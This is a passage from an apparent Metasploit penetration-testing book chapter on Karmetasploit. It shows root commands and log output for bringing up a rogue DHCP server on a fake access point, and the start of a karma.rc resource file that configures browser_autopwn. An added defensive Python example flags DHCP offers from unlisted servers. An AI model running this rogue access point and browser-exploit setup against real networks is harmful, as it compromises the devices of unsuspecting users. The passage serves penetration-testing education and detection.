Chapter 12
Next, we turn on the at0 interface and start the DHCP server:
root@bt:/opt/metasploit3/msf3# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
root@bt:/opt/metasploit3/msf3# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
. . . SNIP . . .
Wrote 0 leases to leases file.
Listening on LPF/at0/00:21:29:e2:de:14/10.0.0/24
Sending on LPF/at0/00:21:29:e2:de:14/10.0.0/24
Sending on Socket/fallback/fallback-net
Can't create PID file /var/run/dhcpd.pid: Permission denied.
root@bt:/opt/metasploit3/msf3# ps aux |grep dhcpd
dhcpd 4015 0.0 0.2 3812 1840 ? Ss 14:09 0:00 dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
root 4017 0.0 0.0 2012 564 pts/4 S+ 14:09 0:00 grep dhcpd
root@bt:/opt/metasploit3/msf3# tail -f /var/log/messages
Apr 2 14:06:57 bt kernel: device mon0 entered promiscuous mode
Apr 2 14:09:30 bt dhcpd: Internet Systems Consortium DHCP Server V3.1.1
Apr 2 14:09:30 bt kernel: warning: `dhcpd3' uses 32-bit capabilities (legacy support in use)
Apr 2 14:09:30 bt dhcpd: Copyright 2004-2008 Internet Systems Consortium.
Apr 2 14:09:30 bt dhcpd: All rights reserved.
Apr 2 14:09:30 bt dhcpd: For info, please visit http://www.isc.org/sw/dhcp/
Apr 2 14:09:30 bt dhcpd: Wrote 0 leases to leases file.
Apr 2 14:09:30 bt dhcpd: Listening on LPF/at0/00:21:29:e2:de:14/10.0.0/24
Apr 2 14:09:30 bt dhcpd: Sending on LPF/at0/00:21:29:e2:de:14/10.0.0/24
The at0 interface is turned on using the IP address of 10.0.0.1, and the DHCP server is started using the configuration file we created earlier, also using at0. To make sure that the DHCP server is running, we run a quick ps aux. Finally, we tail the messages log file to see when IP addresses are being handed out.
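Seen from the defended network, the DHCP server started above is one that no administrator authorized, and each of its replies names it in option 54 (server identifier). The following added example, which is not from the book, parses a DHCP reply and flags an OFFER or ACK whose server identifier is not on an allowlist. The allowlisted address 192.168.1.1, the leased addresses and the function names are assumptions, and the sample packets are constructed rather than captured.

```python
import socket
import struct

MAGIC_COOKIE = b"\x63\x82\x53\x63"   # RFC 2131 marker that precedes the options
OFFER, ACK = 2, 5                    # option 53 values that only servers send

def parse_dhcp(payload):
    """Return (yiaddr, {option code: value bytes}) for a BOOTP/DHCP payload."""
    if len(payload) < 240 or payload[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP message")
    options, i = {}, 240
    while i < len(payload) and payload[i] != 255:    # 255 = end option
        if payload[i] == 0:                          # pad option: no length byte
            i += 1
            continue
        if i + 1 >= len(payload) or i + 2 + payload[i + 1] > len(payload):
            raise ValueError("truncated option")
        length = payload[i + 1]
        options[payload[i]] = payload[i + 2:i + 2 + length]
        i += 2 + length
    return socket.inet_ntoa(payload[16:20]), options

def check_reply(payload, allowed_servers):
    """Return an alert string for an OFFER/ACK from an unlisted server, else None."""
    yiaddr, opts = parse_dhcp(payload)
    msg_type = opts.get(53) or b"\x00"
    if msg_type[0] not in (OFFER, ACK):
        return None
    ident = opts.get(54, b"")                        # option 54 = server identifier
    server = socket.inet_ntoa(ident) if len(ident) == 4 else "missing"
    if server in allowed_servers:
        return None
    return f"unexpected DHCP server {server} offered {yiaddr}"

def build_reply(server, yiaddr, msg_type=OFFER):
    """Constructed sample reply for the demo; not a capture."""
    fixed = struct.pack("!BBBBIHH", 2, 1, 6, 0, 0x1234, 0, 0)   # op=BOOTREPLY
    fixed += b"\x00" * 4 + socket.inet_aton(yiaddr) + b"\x00" * 8
    fixed += b"\x00" * (16 + 64 + 128) + MAGIC_COOKIE
    return fixed + bytes([53, 1, msg_type, 54, 4]) + socket.inet_aton(server) + b"\xff"

ALLOWED = {"192.168.1.1"}            # assumed legitimate server (constructed value)
if __name__ == "__main__":
    for pkt in (build_reply("192.168.1.1", "192.168.1.50"),
                build_reply("10.0.0.1", "10.0.0.100")):
        print(check_reply(pkt, ALLOWED) or "ok")
```

On a monitoring host, the payload passed to check_reply would be the UDP data of traffic sent from port 67 to port 68.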
Now that the entire Karmetasploit configuration is complete, we can load the resource file from within msfconsole using resource karma.rc as shown next. (Note that we can also pass the resource file to msfconsole via the command line by entering msfconsole -r karma.rc.) Let’s see it in action:
msf > resource karma.rc
resource (karma.rc)> db_connect postgres:toor@127.0.0.1/msfbook
resource (karma.rc)> use auxiliary/server/browser_autopwn
resource (karma.rc)> setg AUTOPWN_HOST 10.0.0.1
AUTOPWN_HOST => 10.0.0.1
resource (karma.rc)> setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource (karma.rc)> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource (karma.rc)> set LHOST 10.0.0.1
LHOST => 10.0.0.1
resource (karma.rc)> set LPORT 45000
LPORT => 45000
resource (karma.rc)> set SRVPORT 55550
SRVPORT => 55550
resource (karma.rc)> set URIPATH /ads